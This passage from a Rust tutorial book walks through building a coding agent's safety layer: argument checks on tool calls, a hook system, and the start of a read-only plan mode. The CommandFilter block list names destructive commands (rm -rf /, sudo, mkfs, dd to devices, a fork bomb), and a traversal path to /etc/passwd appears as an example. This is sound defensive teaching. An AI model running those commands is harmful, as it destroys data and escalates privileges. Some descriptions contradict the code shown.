The permission engine from Chapter 13 gates every tool call -- it decides whether to allow, deny, or ask the user before execution proceeds. But it makes that decision based on the tool, not the arguments. A write call in auto mode is allowed regardless of whether the target path is src/main.rs or .env. A bash call in default mode prompts the user whether the command is ls or rm -rf /. The permission engine knows who is knocking. It does not look at what they are carrying.

Safety checks fill that gap. The SafetyChecker performs static analysis on tool arguments before the permission engine runs. It examines the actual path being written or the actual command being executed, and blocks operations that are dangerous regardless of what the permission mode says. This is defense-in-depth: even if the permission engine would allow a tool call, the safety checker can still reject it.

Why two layers? Because they protect against different failure modes. The permission engine protects against the LLM doing things the user did not authorize. The safety checker protects against the LLM doing things that are never safe -- writing to .env, running rm -rf /, executing a fork bomb. A user who sets bypass mode is saying "I trust the agent." The safety checker says "trust has limits."

cargo test -p mini-claw-code-starter safety

Goal

  • Implement PathValidator to confine file operations to a single directory tree, blocking path traversal attacks like ../../etc/passwd.
  • Implement CommandFilter to block dangerous shell commands (rm -rf /, sudo, fork bombs) using glob pattern matching.
  • Implement ProtectedFileCheck to prevent writes and edits to sensitive files matching protected patterns (.env, .git/config).
  • Wire all checks together through SafeToolWrapper so that any single safety failure blocks the tool call and returns a descriptive error to the LLM.

The SafetyCheck trait and implementations

The safety system lives in src/safety.rs. Unlike the reference implementation which uses a single SafetyChecker struct, the starter uses a trait-based design with three focused implementations and a wrapper.

The SafetyCheck trait

#![allow(unused)]
fn main() {
pub trait SafetyCheck: Send + Sync {
    fn check(&self, tool_name: &str, args: &Value) -> Result<(), String>;
}
}

Each safety check implements this trait. It receives the tool name and arguments, and returns Ok(()) to allow execution or Err(reason) to block it. The trait requires Send + Sync because safety checks are stored inside SafeToolWrapper, which implements Tool and may be shared across async tasks.

Key Rust concept: Send + Sync trait bounds

The Send + Sync bounds on SafetyCheck are required because tools live inside Box<dyn Tool>, which is stored in a HashMap that the agent holds. In an async runtime like tokio, the agent's futures may be moved between threads. Send means the type can be transferred to another thread. Sync means &self references can be shared between threads. Together they guarantee that the safety check can be called from any async task without data races. Without these bounds, the compiler would refuse to store Box<dyn SafetyCheck> inside SafeToolWrapper, because SafeToolWrapper itself must be Send + Sync to satisfy the Tool trait.

PathValidator

#![allow(unused)]
fn main() {
pub struct PathValidator {
    allowed_dir: PathBuf,
    raw_dir: PathBuf,
}
}

The PathValidator confines file operations to a single directory tree. It canonicalizes the allowed directory at construction time, then validates each path argument against it. The agent cannot write to /etc/passwd or edit ~/.ssh/authorized_keys even if the LLM asks nicely.

The validate_path method resolves relative paths against raw_dir, canonicalizes the result (or its parent for new files), and checks starts_with against allowed_dir. The SafetyCheck implementation only fires for tools that take a path argument (read, write, edit).

CommandFilter

#![allow(unused)]
fn main() {
pub struct CommandFilter {
    blocked_patterns: Vec<glob::Pattern>,
}
}

The CommandFilter checks bash commands against a list of blocked glob patterns. rm -rf / deletes everything. sudo escalates privileges. :(){:|:&};: is a fork bomb that crashes the system. These are never safe to run, regardless of context.

The default_filters() constructor provides a sensible starting point:

#![allow(unused)]
fn main() {
pub fn default_filters() -> Self {
    Self::new(&[
        "rm -rf /".into(),
        "rm -rf /*".into(),
        "sudo *".into(),
        "> /dev/sda*".into(),
        "mkfs.*".into(),
        "dd if=*of=/dev/*".into(),
        ":(){:|:&};:".into(),
    ])
}
}

ProtectedFileCheck

#![allow(unused)]
fn main() {
pub struct ProtectedFileCheck {
    patterns: Vec<glob::Pattern>,
}
}

The ProtectedFileCheck blocks writes and edits to files matching protected glob patterns. It checks both the full path and just the filename against each pattern, so a pattern like .env matches /project/.env regardless of directory.


The SafeToolWrapper

The SafeToolWrapper is the glue that connects safety checks to the tool system:

#![allow(unused)]
fn main() {
pub struct SafeToolWrapper {
    inner: Box<dyn Tool>,
    checks: Vec<Box<dyn SafetyCheck>>,
}
}

It wraps a Box<dyn Tool> with a Vec<Box<dyn SafetyCheck>>. When call() is invoked, it runs all safety checks first. If any check returns Err, the wrapper returns Ok(format!("error: safety check failed: {reason}")) -- note that it returns Ok with an error message string, not Err. This is because in the starter, Tool::call returns anyhow::Result<String>, and a safety denial is not a system error -- it is a controlled rejection that the LLM should see and adapt to.

#![allow(unused)]
fn main() {
#[async_trait]
impl Tool for SafeToolWrapper {
    fn definition(&self) -> &ToolDefinition {
        self.inner.definition()
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        // Run all safety checks. If any returns Err, return the error as a string.
        // Otherwise, call the inner tool.
        unimplemented!()
    }
}
}

The with_check convenience constructor wraps a single check:

#![allow(unused)]
fn main() {
pub fn with_check(tool: Box<dyn Tool>, check: impl SafetyCheck + 'static) -> Self {
    Self::new(tool, vec![Box::new(check)])
}
}

This design means safety checks are composable. You can wrap a tool with a PathValidator, a CommandFilter, and a ProtectedFileCheck all at once -- each runs independently, and any single failure blocks the call.


How the checks dispatch

flowchart LR
    A["SafeToolWrapper.call(args)"] --> B["PathValidator"]
    A --> C["CommandFilter"]
    A --> D["ProtectedFileCheck"]
    B -->|"read/write/edit"| E{"Path inside<br/>allowed_dir?"}
    C -->|"bash"| F{"Command<br/>matches blocked<br/>pattern?"}
    D -->|"write/edit"| G{"Filename<br/>matches protected<br/>pattern?"}
    E -->|No| H["Err: blocked"]
    E -->|Yes| I["Ok"]
    F -->|Yes| H
    F -->|No| I
    G -->|Yes| H
    G -->|No| I
    I --> J["Inner tool.call(args)"]
    H --> K["Return error string<br/>to LLM"]

Each SafetyCheck implementation decides which tools it applies to by matching on the tool_name parameter in its check method:

  • PathValidator -- Fires for read, write, and edit. Extracts the path argument and validates it against the allowed directory.
  • CommandFilter -- Fires only for bash. Extracts the command argument and checks it against blocked patterns.
  • ProtectedFileCheck -- Fires for write and edit. Extracts the path argument and checks both the full path and filename against protected patterns.

Tools that do not match any check pass through unchecked. Read-only tools like read are checked by PathValidator (to enforce directory boundaries) but not by ProtectedFileCheck (reading .env is not dangerous -- the danger is in writing to sensitive files).

Each check returns Ok(()) for tools it does not handle, so wrapping a tool with an irrelevant check is harmless -- it just passes through.


Path validation

The PathValidator::validate_path method implements directory containment checking:

#![allow(unused)]
fn main() {
pub fn validate_path(&self, path: &str) -> Result<(), String> {
    let target = Path::new(path);

    // Step 1: resolve to absolute path
    let resolved = if target.is_absolute() {
        target.to_path_buf()
    } else {
        self.raw_dir.join(target)
    };

    // Step 2: canonicalize (resolves symlinks and ..)
    let canonical = if resolved.exists() {
        resolved.canonicalize()
            .map_err(|e| format!("cannot resolve path: {e}"))?
    } else {
        // For new files, canonicalize the parent directory
        let parent = resolved.parent().ok_or("invalid path")?;
        if parent.exists() {
            let mut c = parent.canonicalize()
                .map_err(|e| format!("cannot resolve parent: {e}"))?;
            if let Some(filename) = resolved.file_name() {
                c.push(filename);
            }
            c
        } else {
            return Err(format!("parent directory does not exist: {}",
                parent.display()));
        }
    };

    // Step 3: check containment
    if canonical.starts_with(&self.allowed_dir) {
        Ok(())
    } else {
        Err(format!("path {} is outside allowed directory {}",
            canonical.display(), self.allowed_dir.display()))
    }
}
}

The key steps:

  1. Resolve relative paths against raw_dir to get an absolute path.
  2. Canonicalize the target. If the file exists, canonicalize it directly. If not, canonicalize the parent directory and append the filename. This handles the common case of writing a new file in an existing directory.
  3. Check starts_with against the canonicalized allowed_dir.

This is more robust than a simple prefix match because canonicalization resolves .. components and symlinks. A path like /project/../etc/passwd gets resolved to /etc/passwd, which fails the starts_with check against /project.


Protected file pattern matching

The ProtectedFileCheck uses glob::Pattern for matching. For each write or edit call, it extracts the path argument and checks both the full path and just the filename against each pattern:

#![allow(unused)]
fn main() {
fn check(&self, tool_name: &str, args: &Value) -> Result<(), String> {
    match tool_name {
        "write" | "edit" => {
            if let Some(path) = args.get("path").and_then(|v| v.as_str()) {
                for pattern in &self.patterns {
                    // Check full path and filename separately
                    if pattern.matches(path)
                        || pattern.matches(
                            Path::new(path).file_name()
                                .unwrap_or_default()
                                .to_str().unwrap_or(""),
                        )
                    {
                        return Err(format!(
                            "file `{path}` is protected (matches pattern `{}`)",
                            pattern.as_str()
                        ));
                    }
                }
                Ok(())
            } else {
                Ok(())
            }
        }
        _ => Ok(()),
    }
}
}

Checking both the full path and the filename is important. A pattern like .env should match /project/.env whether you write the pattern as a full path glob or a simple filename. The glob::Pattern crate handles the actual matching, giving us proper glob semantics including wildcards and character classes.


Command filtering

The CommandFilter::is_blocked method checks a command against blocked glob patterns:

#![allow(unused)]
fn main() {
pub fn is_blocked(&self, command: &str) -> Option<&str> {
    // Trim command, check against each pattern, return matching pattern
    unimplemented!()
}
}

Unlike the reference implementation which uses substring matching, the starter uses glob::Pattern for command matching. This gives more expressive pattern support -- "sudo *" matches any command starting with sudo followed by arguments, while "rm -rf /*" matches the specific dangerous pattern.

The SafetyCheck implementation only fires for the bash tool:

#![allow(unused)]
fn main() {
fn check(&self, tool_name: &str, args: &Value) -> Result<(), String> {
    // Only check 'bash' tool, extract command, call is_blocked
    unimplemented!()
}
}

The limitations are similar to any pattern-based approach: it can produce false positives (blocking harmless commands that match a pattern) and false negatives (missing dangerous commands that use different syntax). For a tutorial, pattern matching is the right trade-off -- it demonstrates the architecture without the complexity of shell parsing.


How Claude Code does it

Claude Code's safety checking is considerably more sophisticated, operating at multiple levels:

Command classification with parsing. Rather than substring matching, Claude Code classifies commands using regex patterns combined with shell AST parsing. It understands that rm -rf / and rm -r -f / and command rm -rf / are the same operation. It parses pipes and redirects to check each command in a pipeline separately. Our substring approach is a flat string scan -- no structure, no parsing.

Path normalization and symlink resolution. Claude Code resolves ../, ~, environment variables, and symbolic links before checking paths. A path like $HOME/../../../etc/passwd gets normalized to /etc/passwd before the directory check runs. Our implementation takes paths at face value -- a crafted path with ../ could bypass the allowed directory check.

Git-aware protected paths. Claude Code considers git status when deciding what to protect. An untracked .env file (one that is not in the repository) gets stronger protection than a tracked one -- if it is untracked, it likely contains real secrets that were intentionally excluded from version control. Our implementation treats all .env files the same.

Severity levels. Claude Code distinguishes between operations that should be warned about and operations that should be blocked. Writing to .env might produce a warning that the user can override. Running rm -rf / is an unconditional block. Our Permission::Deny is a single severity -- blocked, no override.

The gap between our implementation and Claude Code's is intentional. Substring matching and prefix-based path checking are easy to reason about and easy to test. They demonstrate the architecture of safety checking -- a separate layer that inspects arguments before the permission engine runs -- without the complexity of shell parsing and path resolution. If you understand how SafetyChecker fits into the pipeline, you understand how Claude Code's safety system fits. The sophistication of the individual checks is an implementation detail.


Where safety checks fit in the pipeline

To see the complete picture, here is how safety checks and the permission engine compose. In the starter, safety checks are embedded inside the tool via SafeToolWrapper. When the SimpleAgent dispatches a tool call:

LLM requests tool call
    |
    v
PermissionEngine.evaluate(tool_name, args)
    |--- Deny? --> block, return error to LLM
    |--- Ask?  --> prompt user
    |--- Allow? --> continue
    v
SafeToolWrapper.call(args)
    |--- SafetyCheck fails? --> return Ok("error: ...") to LLM
    |--- All checks pass?   --> continue
    v
Inner Tool.call(args)
    |
    v
Return result to LLM

In this design, the permission engine runs first (deciding whether the tool should run at all), and the safety checks run inside the tool call itself. The SafeToolWrapper catches dangerous arguments even when the permission engine allows the call. The wrapper returns an error string (not an Err) so the LLM sees the rejection reason and can adjust its approach.

This means safety checks are the inner defense layer. Even with allow_all() permission mode, a tool wrapped with SafeToolWrapper will still block writes to .env or commands containing rm -rf /. The safety wrapper is the floor that no permission configuration can lower.


Tests

Run the safety check tests:

cargo test -p mini-claw-code-starter safety

Key tests:

  • test_safety_path_within_allowed -- A file inside the allowed directory passes validation.
  • test_safety_path_outside_allowed -- /etc/passwd is rejected when the allowed directory is a temp dir.
  • test_safety_path_traversal_blocked -- A ../../etc/passwd traversal path is resolved and rejected.
  • test_safety_path_new_file_in_allowed -- A new (not-yet-existing) file in the allowed directory passes validation.
  • test_safety_safety_check_read_tool -- PathValidator fires for the read tool and validates the path argument.
  • test_safety_safety_check_ignores_bash -- PathValidator skips the bash tool (no path argument to check).
  • test_safety_command_filter_blocks_rm_rf -- rm -rf / and rm -rf /* are both caught.
  • test_safety_command_filter_blocks_sudo -- sudo rm file matches the sudo * pattern.
  • test_safety_command_filter_allows_safe -- ls -la, echo hello, and cargo test pass through.
  • test_safety_protected_file_blocks_env -- Writes to .env and .env.local are blocked.
  • test_safety_protected_file_allows_normal -- Writes to src/main.rs pass through.
  • test_safety_wrapper_blocks_on_check_failure -- SafeToolWrapper returns an "error: safety check failed" string when a check fails.
  • test_safety_wrapper_allows_valid_call -- SafeToolWrapper passes through to the inner tool when all checks pass.
  • test_safety_custom_blocked_commands -- Custom blocked patterns (docker rm *, npm publish*) work correctly.

Key takeaway

Safety checks inspect tool arguments, not tool identity. The permission engine asks "should this tool run at all?" while safety checks ask "is this specific invocation dangerous?" The two layers compose through defense-in-depth: even with all permissions granted, SafeToolWrapper still blocks writes to .env and commands matching rm -rf /.


Recap

The safety system adds a second layer of defense between the LLM and tool execution:

  • Trait-based design -- The SafetyCheck trait allows composable, independent checks. PathValidator, CommandFilter, and ProtectedFileCheck each handle one concern.
  • Argument-level inspection -- Unlike the permission engine which checks tool identity, safety checks examine the actual arguments: which file is being written, which command is being run.
  • SafeToolWrapper -- Wraps any Box<dyn Tool> with a Vec<Box<dyn SafetyCheck>>. Returns Ok("error: ...") on failure, not Err, so the LLM sees the rejection and can adapt.
  • Glob-based matching -- Both CommandFilter and ProtectedFileCheck use glob::Pattern for pattern matching, giving expressive matching without custom code.
  • Path canonicalization -- PathValidator canonicalizes paths before checking, preventing bypass via .. components or symlinks.
  • Defense-in-depth -- Safety checks run inside the tool call. Even with allow_all() permission mode, wrapped tools still enforce safety rules.

The architecture -- composable checks that inspect arguments and wrap tools -- demonstrates the same defense-in-depth pattern that Claude Code uses.

What's next

In Chapter 15: Hook System you will build pre-tool and post-tool hooks -- shell commands that run before and after tool execution. Hooks let users enforce custom policies beyond what the built-in safety checker covers: run a linter after every edit, block writes to specific directories, log every bash command. Where the safety checker is a built-in guard, hooks are user-defined guards.

Check yourself


← Chapter 13: Permission Engine · Contents · Chapter 15: Hooks →

Chapter 15: Hooks

File(s) to edit: src/hooks.rs Test to run: cargo test -p mini-claw-code-starter hooks Estimated time: 40 min

The permission engine from Chapter 13 decides whether a tool call runs. The safety checks from Chapter 14 catch dangerous patterns before the user even sees a prompt. But both systems are baked into the agent -- they enforce rules that you, the developer, chose at compile time. What about the user?

Users have policies that the agent author cannot anticipate. A team might require that every bash command is logged to an audit file. A project might enforce that file writes only touch a specific directory. A CI pipeline might need to run a linter after every edit. These are not safety checks in the "prevent rm -rf /" sense -- they are workflow hooks that extend the agent's behavior at runtime.

This chapter builds the hook system. Hooks are event-driven: they fire at key lifecycle points (before a tool call, after a tool call, when the agent starts, when it ends) and they can observe, modify, or block execution. The trait-based design means anyone can implement a hook -- a logging hook for debugging, a blocking hook for policy enforcement, a shell hook that delegates decisions to external commands.

cargo test -p mini-claw-code-starter hooks

Goal

  • Define the HookEvent enum with four lifecycle points (AgentStart, PreToolCall, PostToolCall, AgentEnd) that carry contextual data.
  • Implement the Hook trait and HookRegistry dispatch logic where Block short-circuits, ModifyArgs accumulates, and Continue is the default.
  • Build three concrete hooks: LoggingHook (observe all events), BlockingHook (deny specific tools), and ShellHook (delegate to external commands).
  • Ensure hooks compose correctly -- registration order determines priority, and blocking hooks prevent later hooks from running.

The event model

Before writing any code, let's define when hooks fire. The agent loop from Chapter 7 has a clear lifecycle:

User prompt arrives
  -> AgentStart
  -> Provider returns tool calls
    -> PreToolCall (for each tool)
    -> Tool executes
    -> PostToolCall (for each tool)
  -> Provider returns final answer
  -> AgentEnd
sequenceDiagram
    participant Agent
    participant Registry as HookRegistry
    participant Tool

    Agent->>Registry: dispatch(AgentStart)
    loop For each tool call
        Agent->>Registry: dispatch(PreToolCall)
        alt Block returned
            Registry-->>Agent: Block(reason)
            Agent->>Agent: Return error to LLM
        else Continue/ModifyArgs
            Registry-->>Agent: Continue or ModifyArgs
            Agent->>Tool: tool.call(args)
            Tool-->>Agent: result
            Agent->>Registry: dispatch(PostToolCall)
        end
    end
    Agent->>Registry: dispatch(AgentEnd)

Four events, four points where external code can intervene:

EventWhen it firesWhat hooks can do
AgentStartBefore the first provider callLog the prompt, initialize state
PreToolCallBefore each tool executionBlock the call, modify arguments
PostToolCallAfter each tool executionLog the result, trigger follow-up actions
AgentEndAfter the final responseLog the response, clean up state

The asymmetry is deliberate. PreToolCall can block or modify because the tool has not run yet -- there is still time to intervene. PostToolCall cannot block because the tool already ran -- blocking at this point would be meaningless. It can only observe.


Core types

Open src/hooks.rs. The module defines three types: HookEvent, HookAction, and the Hook trait.

HookEvent

#![allow(unused)]
fn main() {
#[derive(Debug, Clone)]
pub enum HookEvent {
    PreToolCall {
        tool_name: String,
        args: Value,
    },
    PostToolCall {
        tool_name: String,
        args: Value,
        result: String,
    },
    AgentStart {
        prompt: String,
    },
    AgentEnd {
        response: String,
    },
}
}

Each variant carries the data relevant to its lifecycle point. PreToolCall carries the tool name and arguments -- everything a hook needs to decide whether to allow or modify the call. PostToolCall adds the result string. AgentStart and AgentEnd carry the user prompt and final response respectively.

The enum derives Clone because the HookRegistry passes events by shared reference (&HookEvent) to each hook in sequence. Hooks that need to store events (like the LoggingHook) clone them. Hooks that only inspect events (like the BlockingHook) borrow without cloning.

HookAction

#![allow(unused)]
fn main() {
#[derive(Debug, Clone, PartialEq)]
pub enum HookAction {
    Continue,
    Block(String),
    ModifyArgs(Value),
}
}

Three possible responses, ordered by severity:

  • Continue -- the default. The hook has nothing to say. Execution proceeds normally.
  • Block(reason) -- stop the tool call. The reason string is returned to the LLM as an error message so it can understand why the call was rejected and adjust its approach.
  • ModifyArgs(new_args) -- replace the tool's arguments before execution. This is how hooks can inject defaults, normalize paths, or enforce constraints without blocking the call entirely.

HookAction derives PartialEq so tests can assert on specific actions with assert_eq!. This is purely a testing convenience -- the runtime uses pattern matching, not equality checks.

The Hook trait

#![allow(unused)]
fn main() {
#[async_trait]
pub trait Hook: Send + Sync {
    async fn on_event(&self, event: &HookEvent) -> HookAction;
}
}

One method. It receives an event reference and returns an action. The trait requires Send + Sync because hooks live inside the HookRunner and the runner may be shared across async tasks. The async_trait attribute handles the usual ceremony of boxing the returned future.

This is the same pattern as the Tool trait from Chapter 6 -- a single async method that takes structured input and returns structured output. The difference is scope: tools interact with the outside world (filesystem, shell), while hooks interact with the agent's own execution.


The HookRegistry

Individual hooks are useful, but the real value is composing them. The HookRegistry holds a list of hooks and dispatches events to them sequentially.

#![allow(unused)]
fn main() {
pub struct HookRegistry {
    hooks: Vec<Box<dyn Hook>>,
}

impl HookRegistry {
    pub fn new() -> Self {
        Self { hooks: Vec::new() }
    }

    pub fn register(&mut self, hook: impl Hook + 'static) {
        self.hooks.push(Box::new(hook));
    }

    pub fn with(mut self, hook: impl Hook + 'static) -> Self {
        self.register(hook);
        self
    }

    pub fn is_empty(&self) -> bool {
        self.hooks.is_empty()
    }
}
}

The builder API should look familiar -- it mirrors ToolSet from Chapter 4. The with() method takes ownership and returns self for chaining. The register() method takes &mut self for imperative code. Both accept impl Hook + 'static, boxing the concrete type into a trait object.

The dispatch method

The interesting part is how actions compose:

#![allow(unused)]
fn main() {
pub async fn dispatch(&self, event: &HookEvent) -> HookAction {
    // Iterate hooks in order
    // If any hook returns Block, return Block immediately
    // If any hook returns ModifyArgs, remember the new args
    // If all hooks return Continue (and no ModifyArgs), return Continue
    unimplemented!()
}
}

Three rules:

  1. Block short-circuits. The moment any hook returns Block, the registry stops and returns that action immediately. Later hooks never see the event. This is the right behavior -- if a policy says "no bash," there is no point asking the logging hook for its opinion.

  2. ModifyArgs accumulates. If multiple hooks return ModifyArgs, the last one wins. Each hook that modifies arguments overwrites the previous modification. This is simple but effective -- if you need more complex composition (merging argument objects), you can implement it in a single hook that encapsulates the logic.

  3. Continue is the default. If no hook has an opinion, execution proceeds unchanged. An empty registry always returns Continue.

The sequential evaluation order means hook priority is determined by registration order. Hooks registered first run first. If you want a blocking hook to take precedence over a logging hook, register it first.


Built-in hooks

The module provides three ready-made hooks. Each demonstrates a different pattern of hook usage.

LoggingHook

#![allow(unused)]
fn main() {
pub struct LoggingHook {
    log: std::sync::Mutex<Vec<String>>,
}

impl LoggingHook {
    pub fn new() -> Self {
        Self {
            log: std::sync::Mutex::new(Vec::new()),
        }
    }

    pub fn messages(&self) -> Vec<String> {
        self.log.lock().unwrap().clone()
    }
}

#[async_trait]
impl Hook for LoggingHook {
    async fn on_event(&self, event: &HookEvent) -> HookAction {
        // Format as "pre:{tool_name}", "post:{tool_name}", "agent:start", "agent:end"
        unimplemented!()
    }
}
}

The simplest possible hook: record a short description of every event, never interfere. It always returns Continue, meaning it never blocks or modifies anything. The Mutex<Vec<String>> allows interior mutability -- the on_event method takes &self (not &mut self), so we need a lock to push into the vector.

Key Rust concept: Mutex for interior mutability in async code

The Hook trait requires &self (not &mut self) because the registry holds hooks by shared reference. But LoggingHook needs to mutate its internal log. The solution is std::sync::Mutex<Vec<String>> -- a lock that provides mutual exclusion. When on_event calls self.log.lock().unwrap(), it gets exclusive access to the Vec, pushes a message, and drops the lock when the guard goes out of scope.

Why std::sync::Mutex and not tokio::sync::Mutex? Because the lock is held only for a push operation -- microseconds, no .await inside the critical section. The standard library Mutex is faster for short, synchronous critical sections. You only need tokio::sync::Mutex when you must hold the lock across an .await point.

In the starter, the LoggingHook records string descriptions rather than cloned events. The format is compact: "pre:bash", "post:write", "agent:start", "agent:end". This makes test assertions simpler -- you compare strings rather than matching enum variants.

The LoggingHook is invaluable for testing. You can construct a registry with a LoggingHook, fire some events, and then inspect what was recorded. This is exactly what the tests do.

BlockingHook

#![allow(unused)]
fn main() {
pub struct BlockingHook {
    blocked_tools: Vec<String>,
    reason: String,
}

impl BlockingHook {
    pub fn new(blocked_tools: Vec<String>, reason: impl Into<String>) -> Self {
        Self {
            blocked_tools,
            reason: reason.into(),
        }
    }
}

#[async_trait]
impl Hook for BlockingHook {
    async fn on_event(&self, event: &HookEvent) -> HookAction {
        if let HookEvent::PreToolCall { tool_name, .. } = event {
            if self.blocked_tools.iter().any(|b| b == tool_name) {
                return HookAction::Block(self.reason.clone());
            }
        }
        HookAction::Continue
    }
}
}

A policy hook: it takes a list of tool names and blocks any PreToolCall event that matches. Everything else -- PostToolCall, AgentStart, AgentEnd, and pre-tool events for tools not on the list -- passes through as Continue.

The pattern match is deliberate. The hook only inspects PreToolCall events. On a PostToolCall for a blocked tool, it does nothing -- the tool has already run and blocking would be meaningless. This is the asymmetry from the event model table above, enforced in code.

You could use BlockingHook to implement workspace-level policies. For example, a read-only project might block write, edit, and bash:

#![allow(unused)]
fn main() {
let hook = BlockingHook::new(
    vec!["write".into(), "edit".into(), "bash".into()],
    "this workspace is read-only",
);
}

The LLM would see the block reason in the tool result and switch to read-only tools for the rest of the session.

ShellHook

#![allow(unused)]
fn main() {
pub struct ShellHook {
    command: String,
    tool_pattern: Option<glob::Pattern>,
}

impl ShellHook {
    pub fn new(command: impl Into<String>) -> Self {
        Self {
            command: command.into(),
            tool_pattern: None,
        }
    }

    pub fn for_tool(mut self, pattern: &str) -> Self {
        self.tool_pattern = glob::Pattern::new(pattern).ok();
        self
    }

    fn matches_tool(&self, tool_name: &str) -> bool {
        match &self.tool_pattern {
            Some(pattern) => pattern.matches(tool_name),
            None => true,
        }
    }
}
}

The ShellHook bridges the gap between Rust code and external commands. Instead of implementing policy in Rust, it delegates to a shell command. The command signals its decision through its exit code.

The for_tool builder method restricts which tools the hook fires for, using a glob pattern. Without it, the hook fires for all tools. ShellHook::new("cargo fmt --check").for_tool("write") only fires when the write tool is called.

The on_event implementation handles PreToolCall and PostToolCall events:

#![allow(unused)]
fn main() {
#[async_trait]
impl Hook for ShellHook {
    async fn on_event(&self, event: &HookEvent) -> HookAction {
        // Only handle PreToolCall and PostToolCall events
        // Check matches_tool() first
        // Run: tokio::process::Command::new("sh").arg("-c").arg(&self.command).output()
        // Exit code 0 -> Continue, non-zero -> Block with stderr
        unimplemented!()
    }
}
}

The execution flow:

  1. Extract tool name. Only PreToolCall and PostToolCall events are handled. AgentStart and AgentEnd return Continue immediately.

  2. Check the tool pattern. If a tool_pattern is set and does not match the tool name, return Continue.

  3. Run the command. Uses tokio::process::Command to spawn sh -c <command>.

  4. Interpret the exit code. A non-zero exit means "block this call." The stderr is captured and included in the block reason. A zero exit means Continue.

Here is a concrete example. Run a linter after every file edit:

#![allow(unused)]
fn main() {
let hook = ShellHook::new("cargo fmt --check")
    .for_tool("write");
}

How Claude Code does it

Claude Code's hook system shares the same event-driven architecture but is configured declaratively through settings.json rather than Rust code.

In Claude Code, hooks are defined as JSON objects with matchers and commands:

{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "bash",
        "command": "/path/to/check-bash-command.sh"
      }
    ],
    "PostToolUse": [
      {
        "matcher": "*",
        "command": "echo 'Tool $TOOL_NAME completed'"
      }
    ]
  }
}

The matcher field supports glob patterns against tool names. The command field is a shell command that receives context through environment variables -- the same pattern as our ShellHook. Non-zero exits on pre-tool hooks block the call. Claude Code's hooks can also modify tool arguments by writing JSON to stdout, which the agent parses and applies.

Our trait-based approach provides the same extensibility through a different mechanism. Instead of JSON configuration, hooks are Rust types that implement the Hook trait. This gives us compile-time type safety and the ability to write hooks with complex logic (the BlockingHook matches against a list of tool names; the LoggingHook records structured events). The trade-off is that adding a new hook requires writing Rust code rather than editing a config file.

The ShellHook bridges this gap -- it delegates to external commands just like Claude Code's JSON-configured hooks do. A production agent would likely combine both approaches: built-in hooks for core policies (implemented in Rust) and shell hooks for user-defined customization (configured at runtime).


Tests

Run the hook system tests:

cargo test -p mini-claw-code-starter hooks

Key tests:

  • test_hooks_logging_hook -- LoggingHook records "pre:bash" for a PreToolCall event and returns Continue.
  • test_hooks_logging_hook_multiple_events -- LoggingHook records all four event types in order: ["agent:start", "pre:read", "post:read", "agent:end"].
  • test_hooks_blocking_hook -- BlockingHook returns Block("bash is disabled") for a bash PreToolCall.
  • test_hooks_blocking_hook_allows_other_tools -- BlockingHook returns Continue for tools not in the blocked list.
  • test_hooks_registry_dispatch_continue -- Registry with only a LoggingHook returns Continue.
  • test_hooks_registry_dispatch_block -- Registry with LoggingHook then BlockingHook returns Block for bash.
  • test_hooks_registry_multiple_hooks_order -- Both hooks in a two-hook registry are called for a non-blocked event.
  • test_hooks_registry_block_short_circuits -- When a BlockingHook fires, hooks registered after it are never called.
  • test_hooks_registry_is_empty -- Verifies is_empty() before and after registration.
  • test_hooks_post_tool_event -- LoggingHook correctly formats PostToolCall events as "post:write".

Key takeaway

The hook system is an event bus with three possible responses: observe (Continue), intervene (Block), or transform (ModifyArgs). Registration order determines priority, and Block short-circuits immediately. This gives users a clean extension point for custom policies without modifying the agent's core loop.


Recap

This chapter added an event-driven hook system that lets external code observe, modify, and block agent behavior at runtime:

  • HookEvent defines four lifecycle points: AgentStart, PreToolCall, PostToolCall, and AgentEnd. Each carries the context relevant to its point in the agent loop.

  • HookAction defines three responses: Continue (proceed normally), Block (cancel the tool call with a reason), and ModifyArgs (replace the tool arguments). The asymmetry between pre and post events is enforced in the hook implementations -- only pre-tool hooks can meaningfully block.

  • HookRegistry dispatches events to hooks sequentially. Block short-circuits immediately. ModifyArgs accumulates (last writer wins). Continue is the default for an empty registry.

  • LoggingHook records all events in a Mutex<Vec<HookEvent>> for debugging and testing. It never interferes with execution.

  • BlockingHook blocks specific tools by name on PreToolCall events. It ignores everything else.

  • ShellHook delegates to an external shell command via tokio::process::Command. Non-zero exits block the call. The for_tool() method restricts which tools trigger the command using glob::Pattern.

The hook system completes the safety and control layer. The permission engine (Chapter 13) enforces mode-based access rules. Safety checks (Chapter 14) catch dangerous patterns statically. Hooks (this chapter) provide the escape hatch for policies that are too specific or too dynamic to hardcode.


What's next

Chapter 16 -- Plan Mode -- ties together everything from Part III. Plan mode is a restricted execution mode where only read-only tools run. The agent can read files, search code, and reason about a task, but it cannot write, edit, or execute commands. The permission engine checks tool categories. Safety checks validate arguments. Hooks fire for observation. But nothing destructive happens. It is the ultimate guardrail: the agent plans, the user reviews, and only then does execution begin.

Check yourself


← Chapter 14: Safety Checks · Contents · Chapter 16: Plan Mode →

Chapter 16: Plan Mode

File(s) to edit: src/planning.rs Test to run: cargo test -p mini-claw-code-starter plan Estimated time: 50 min

Your agent can now read files, write code, run shell commands, and do all of it under a permission system with safety checks and hooks. There is one problem: it does everything at once. The model reads a file, immediately rewrites it, runs the tests, and keeps going -- all in a single uninterrupted loop. If the model misunderstands the task, it has already modified your codebase before you had a chance to say "wait, that is not what I meant."

Plan mode fixes this by splitting the agent loop into two phases. First, the agent analyzes the task using only read-only tools -- reading files, searching code, listing directories. It produces a plan. Then, the caller (you, or your UI) inspects the plan, approves it, and the agent executes with all tools available. Think before you act. It is advice that works for humans and agents alike.

This pattern is not hypothetical. Claude Code ships with a plan mode that restricts the agent to read-only operations until the user explicitly approves the plan. Every serious coding agent has some version of this -- a way to let the model reason about a task before committing to changes. The is_read_only() flag you set on tools back in Chapter 12 has been waiting for exactly this moment.

cargo test -p mini-claw-code-starter plan

Goal

  • Build a PlanAgent with two distinct phases: plan() (read-only tools only) and execute() (all tools available).
  • Implement the exit_plan virtual tool that lets the LLM explicitly signal "I am done planning" without requiring a StopReason::Stop.
  • Enforce two layers of write protection during planning: filter tool definitions so the LLM does not see write tools, and block write tool calls at execution time as a fallback.
  • Maintain message continuity between phases so the execution phase has full context from the planning phase.

Why a separate agent?

You could implement plan mode as a flag on SimpleAgent -- add a plan_mode: bool field, check it in execute_tools, filter definitions accordingly. That works but tangles two concerns. The SimpleAgent is the general-purpose agent loop. Plan mode is a higher-level workflow with distinct phases, transitions, and a virtual tool that does not exist in the tool set. Mixing them muddies both.

